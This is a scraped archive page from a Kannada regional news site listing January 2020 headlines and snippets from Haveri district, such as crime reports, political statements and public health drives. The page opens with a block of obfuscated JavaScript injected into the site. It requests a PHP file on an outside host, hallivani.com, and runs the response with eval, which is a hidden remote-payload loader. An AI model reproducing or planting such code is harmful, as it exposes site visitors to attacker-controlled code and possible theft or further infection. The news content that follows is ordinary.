;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: January 2020

ಯುವತಿ ಮೇಲೆ ಆ್ಯಸಿಂಡ್ ದಾಳಿ ಆರೋಪಿ ಪಾಗಲ್ ಪ್ರೇಮಿ ಅಂದರ್

ಹಾವೇರಿ: ಯುವತಿ ಮೇಲೆ ಮಂಗಳವಾರ ಆ್ಯಸಿಂಡ್ ದಾಳಿ ಪರಾರಿಯಾಗಿದ್ದ ಯುವಕನನ್ನು ಬುಧವಾರ ಪೋಲಿಸರು ಬಂಧಿಸಿದ್ದಾರೆ. ಶಿವಮೊಗ್ಗ ಜಿಲ್ಲೆ ಶಿಕಾರಿಪುರ ತಾಲೂಕಿನಲ್ಲಿ…

ಕೆವಿಜಿ ಬ್ಯಾಂಕ್ ಅಸಿಸ್ಟೆಂಟ್ ಮ್ಯಾನೇಜರ್ ಆತ್ಮಹತ್ಯೆಗೆ ಶರಣು

ಹಾವೇರಿ: ತಾಲ್ಲೂಕಿನ ಗುತ್ತಲದ ಚಿದಂಬರ ನಗರದ ಬಾಡಿಗೆ ಮನೆಯಲ್ಲಿ ವಾಸವಾಗಿದ್ದ ಕರ್ನಾಟಕ ವಿಕಾಸ ಗ್ರಾಮೀಣ ಬ್ಯಾಂಕ್ ನ ಅಸಿಸ್ಟೆಂಟ್ ಮ್ಯಾನೇಜರ್…

ಕೌಟುಂಬಿಕ ಕಲಹ ಹಿನ್ನೆಲೆ ದಂಪತಿ ಆತ್ಮಹತ್ಯೆಗೆ ಶರಣು

ಹಾವೇರಿ : ಕೌಟುಂಬಿಕ ಕಲಹ ಹಿನ್ನಲೆಯಲ್ಲಿ ತುಂಗಭದ್ರಾ ನದಿಗೆ ಜಿಗಿದು ದಂಪತಿ ಆತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡಿರುವ ಘಟನೆ ತಾಲೂಕಿನ ಕಂಚಾರಗಟ್ಟಿ ಗ್ರಾಮದ ಬಳಿ…

ಪೌರತ್ವ ತಿದ್ದುಪಡಿ ಕಾಯ್ದೆ ಬಗ್ಗೆ ಕಾಂಗ್ರೆಸ್ ನಿಂದ ಅನಗತ್ಯ ಗೋಂದಲ ಸೃಷ್ಟಿ ಶಿವಾನಂದ ಗುರುಮಠ ಆರೋಪ

ಹಾವೇರಿ: ಕಾಂಗ್ರೆಸ್ ಪಕ್ಷ ವಿನಾ ಕಾರಣ ಸಿಎಎ ಬಗ್ಗೆ ಜನರಲ್ಲಿ ಗೊಂದಲ ಉಂಟು ಮಾಡಿದ್ದು, ಬಾಂಗ್ಲಾ, ಅಪಘಾನಿಸ್ತಾನ ಹಾಗೂ ಪಾಕಿಸ್ತಾನದಿಂದ…

ಎಂಇಎಸ್ ಹುತಾತ್ಮಕ ಕಾರ್ಯಕ್ರಮ: ಮಹಾರಾಷ್ಟ್ರ ಆರೋಗ್ಯ ಸಚಿವ ರಾಜೇಂದ್ರ ಪಾಟೀಲ ಖಾಸಗಿ ಆಗಮನ ಮರಳಿಸಿದ ಪೊಲೀಸರು

ಬೆಳಗಾವಿ: ಎಂಇಎಸ್ ಹಮ್ಮಿಕೊಂಡ ಹುತಾತ್ಮಕ ದಿನಾಚರಣೆ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಖಾಸಗಿಯಾಗಿ ಆಗಮಿಸಿದ್ದ ಮಹಾರಾಷ್ಟ್ರದ ಆರೋಗ್ಯ ಇಲಾಖೆಯ ಸಚಿವ ರಾಜೇಂದ್ರ ಪಾಟೀಲ ಅವರನ್ನು…

ದೇಶ ವಿರೋಧಿಗಳಿಂದ ನಾನು ಹತನಾದರೆ ನನ್ನ ಪಾಲಕರಿಗೆ ಕರೆ ಮಾಡಿ ಧೈರ್ಯ ಹೇಳಿ: ಚಕ್ರವರ್ತಿ ಸೂಲಿಬೆಲೆ

ಹಾವೇರಿ: ಎಸ್.ಡಿ.ಪಿ.ಐ ಸಂಘಟನೆಯಲ್ಲಿ ಕೊಲೆ ಮಾಡುವ ಕಾರ್ಯ ಅವರ ರಕ್ತದಲ್ಲೇ ಸೇರಿದ್ದು, ಅವರ ಬೇದರಿಕೆಗೆ ಹೇದರುವವ ನಾನಲ್ಲ. ಒಂದು ವೇಳೆ…

ಒಡೆದ ಮನಸ್ಸು ಬೆಸೆವ ಶಕ್ತಿ ಕಲೆಯಲ್ಲಿದೆ: ಮಾಗನಹಳ್ಳಿ ಮಂಜುನಾಥ್

ಕರೂರು( ಕುಮಾರಪಟ್ಟಣ): ಒಡೆದ ಮನಸ್ಸುಗಳನ್ನು ಬೆಸೆಯುವ ಶಕ್ತಿ ಕಲೆಯಲ್ಲಿ ಅಡಗಿದ್ದು, ಆಧುನಿಕತೆಯ ಕಲೆ ಹಾಗೂ ಸಂಸ್ಕೃತಿಗಳ ಬೇರುಗಳನ್ನು ದುರ್ಬಲಗೊಳಿಸುತ್ತಿವೆ ಎಂದು…

ನಿಧನ

ಹುಬ್ಬಳ್ಳಿ: ಹಾವೇರಿ ಜಿಲ್ಲೆ ಸವಣೂರು ಮೂಲದ ಹುಬ್ಬಳ್ಳಿಯ ಶಿವಾನಂದ ನಗರದ ನಿವಾಸಿ ಶಿವಾನಂದಗೌಡ ವಿಠ್ಠಪ್ಪಗೌಡ ಗುಡಿಸಾಗರ (71) ಅನಾರೋಗ್ಯದಿಂದ ಬುಧವಾರ…

ಜಿಲ್ಲೆಯಾದ್ಯಂತ ಜ. 19 ರಿಂದ 22ರವರೆಗೆ ಪಲ್ಸ್ ಪೋಲಿಯೋ ಕಾರ್ಯಕ್ರಮ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಾದ್ಯಂತ ಜನವರಿ 19ರ ಭಾನುವಾರ ಜಿಲ್ಲೆಯಾದ್ಯಂತ ರಾಷ್ಟ್ರೀಯ ಪಲ್ಸ್ ಪೋಲಿಯೋ ಕಾರ್ಯಕ್ರಮ ಹಮ್ಮಿಕೊಳ್ಳಲಾಗಿದೆ. ಯಾವುದೇ ಮಗು ಪೋಲಿಯೋ ಹನಿಯಿಂದ…

ಹಾವೇರಿ ಬಿಜೆಪಿ ಜಿಲ್ಲಾ ಘಟಕದ ನೂತನ ಅಧ್ಯಕ್ಷರಾಗಿ ಜಿ.ಪಂ.ಸದಸ್ಯ ಸಿದ್ದರಾಜ ಕಲಕೋಟಿ ಆಯ್ಕೆ

ಹಾವೇರಿ: ಭಾರತೀಯ ಜನತಾ ಪಾರ್ಟಿಯ ಜಿಲ್ಲಾ ಘಟಕದ ನೂತನ ಅಧ್ಯಕ್ಷರಾಗಿ ಜಿಲ್ಲಾ ಪಂಚಾಯತ ಸದಸ್ಯ ಸಿದ್ದರಾಜ ಕಲಕೋಟಿ ಅವರು ಆಯ್ಕೆಯಾಗಿದ್ದಾರೆ….

ಅಪ್ರಾಪ್ತ ಬಾಲಕಿ ಕೆನ್ನೆಗೆ ಮುತ್ತಿಟ್ಟ ಆರೋಪಿಗೆ ಎಂಟು ವರ್ಷ ಸಜೆ: ವಿಶೇಷ ನ್ಯಾಯಾಲಯದಿಂದ ತೀರ್ಪು

ಹಾವೇರಿ: ಅಪ್ರಾಪ್ತ ಬಾಲಕಿ ಕೆನ್ನೆಗೆ ಮುತ್ತಿಟ್ಟ 24ವರ್ಷದ ಆರೋಪಿ ಸಂತೋಷ ಶಂಕ್ರಪ್ಪ ಲಮಾಣಿ ಈತನಿಗೆ ಎಂಟು ವರ್ಷ ಸಜೆ ಹಾಗೂ…

ಜಿಲ್ಲಾಡಳಿತದಿಂದ ಅರ್ಥಪೂರ್ಣ ಗಣರಾಜ್ಯೋತ್ಸವ ಆಚರಣೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ಜಿಲ್ಲಾಡಳಿತದಿಂದ ಜನವರಿ ೨೬ ರಂದು ಅರ್ಥಪೂರ್ಣವಾಗಿ ಗಣರಾಜ್ಯೋತ್ಸವ ಆಚರಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಕ್ರಿಯಾಶೀಲವಾಗಿ ಅಧಿಕಾರಿಗಳು ಸಿದ್ಧತೆಗಳನ್ನು ಕೈಗೊಳ್ಳುವಂತೆ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ…

ಮಿಂಚಿನ ಮತದಾರರ ನೋಂದಣಿ-ಯುವ ಮತದಾರರನ್ನು ನೋಂದಾಯಿಸಿ ಕಾಲೇಜು ಪ್ರಾಚಾರ್ಯರಿಗೆ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಸೂಚನೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಾದ್ಯಂತ ಯುವ ಹಾಗೂ ಭಾವಿ ಮತದಾರರ ನೋಂದಣಿಗಾಗಿ ಭಾರತ ಚುನಾವಣಾ ಆಯೋಗದ ಸೂಚನೆಯಂತೆ ಜನವರಿ ೬, ೭ ಹಾಗೂ…

ಬೆಳೆ ಪರಿಹಾರ ವಿತರಣೆಯಲ್ಲಿ ಲೋಪ-ಪ್ರಾದೇಶಿಕ ಅಧಿಕಾರಿಗಳ ಮಟ್ಟದಿಂದ ತನಿಖೆಗೆ ಆದೇಶ: ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಹಾವೇರಿ: ಅತಿವೃಷ್ಟಿ ಮತ್ತು ನೆರೆಯಿಂದ ಹಾನಿಯಾದ ಬೆಳೆಗಳಿಗೆ ಪರಿಹಾರ ವಿತರಣೆಯಲ್ಲಿ ಗಂಭೀರವಾದ ಲೋಪವಾಗಿದೆ. ಸಮರ್ಪಕವಾಗಿ ರೈತರಿಗೆ ಪರಿಹಾರ ದೊರಕಿಲ್ಲ. ಬೆಳೆ…

ನಗರ ಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳ ಕುಡಿಯುವ ನೀರಿನ ವೆಚ್ಚ: ಎಸಿಬಿಯಿಂದ ತನಿಖೆಗೆ ಗೃಹ ಸಚಿವರ ಸೂಚನೆ

ಹಾವೇರಿ: ಕಳೆದ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಕುಡಿಯುವ ನೀರಿನ ಪೂರೈಕೆಗಾಗಿ ಜಿಲ್ಲೆಯ ನಗರ ಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳು ವೆಚ್ಚಮಾಡಿದ ಹಣದ ಕುರಿತಂತೆ ಭ್ರಷ್ಟಾಚಾರ…

ದೋಣಿ ದುರಂತದಲ್ಲಿ ಮಡಿದ ಸಂತ್ರಸ್ತರ ಕುಟುಂಬಕ್ಕೆ ಗೃಹ ಸಚಿವರಿಂದ ಪರಿಹಾರ ವಿತರಣೆ

ಹಾವೇರಿ: ಕಾರವಾರ ಅರಬ್ಬಿಸಮುದ್ರದ ನಡುಗಡ್ಡೆ ಕೂರ್ಮಗಡ ನರಸಿಂಹದೇವರ ಜಾತ್ರೆಗೆ ತೆರಳಿದ ಸಂದರ್ಭದಲ್ಲಿ ದೋಣಿ ದುರಂತದಲ್ಲಿ ಮಡಿದ ಜಿಲ್ಲೆಯ ಶಿಗ್ಗಾಂವ ತಾಲೂಕಿನ…

ವಿದೇಶಿ ತಜ್ಞರಿಂದ ತರಬೇತಿ ಪಡೆಯುವ ಅವಕಾಶ ಕಲ್ಪಿಸಲು ಚಿಂತನೆ: ಗೃಹ ಸಚಿವ ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಹಾವೇರಿ: ಮುಂಬರುವ ದಿನಗಳಲ್ಲಿ ಪೋಲಿಸರಿಗೆ ವಿದೇಶಗಳ ತಜ್ಞ ತರಬೇತಿದಾರರಿಂದ ತರಬೇತಿ ನೀಡಲು ಅವಕಾಶ ಕಲ್ಪಿಸುವ ಚಿಂತನೆ ನಡೆಸಲಾಗುತ್ತಿದೆ ಎಂದು ಗೃಹ…

ಸಾವಿತ್ರಿ ಬಾಯಿ ಪುಲೆ ಮಹಿಳಾ ಶಿಕ್ಷಣಕ್ಕೆ ಪ್ರೇರಣೆ: ಬಸವಶಾಂತಲಿಂಗ ಶ್ರೀ

ಹಾವೇರಿ: ನಗರದ ಬಸವಕೇಂದ್ರ ಹೊಸಮಠ ಹಾಗೂ ಎಸ್.ಜೆಎಮ್ ಪಪೂ ಕಾಲೇಜು ಸಹಯೋಗದಲ್ಲಿ ಶುಕ್ರವಾರ ಅಕ್ಷರದವ್ವ ಭಾರತದ ಮೊದಲ ಮಹಿಳಾ ಶಿಕ್ಷಕಿ…

ಜಾನುವಾರ ಜಾತ್ರೆಗೆ ಶಾಸಕ ನೆಹರು ಓಲೇಕಾರ ಚಾಲನೆ: ಗಮನ ಸೇಳೆದ ದೇಶಿ ತಳಿಯ ಎತ್ತುಗಳು

ಹಾವೇರಿ: ಹುಕ್ಕೇರಿಮಠದ ಜಾತ್ರಾ ಮಹೋತ್ಸವದ ಅಂಗವಾಗಿ ಶುಕ್ರವಾರ ಹಾವೇರಿ ಜಿಲ್ಲಾ ಪಂಚಾಯತಿ, ಪಶುಪಾಲನಾ ಮತ್ತು ಪಶುವೈದ್ಯ ಸೇವಾ ಇಲಾಖೆ, ಧಾರವಾಡ…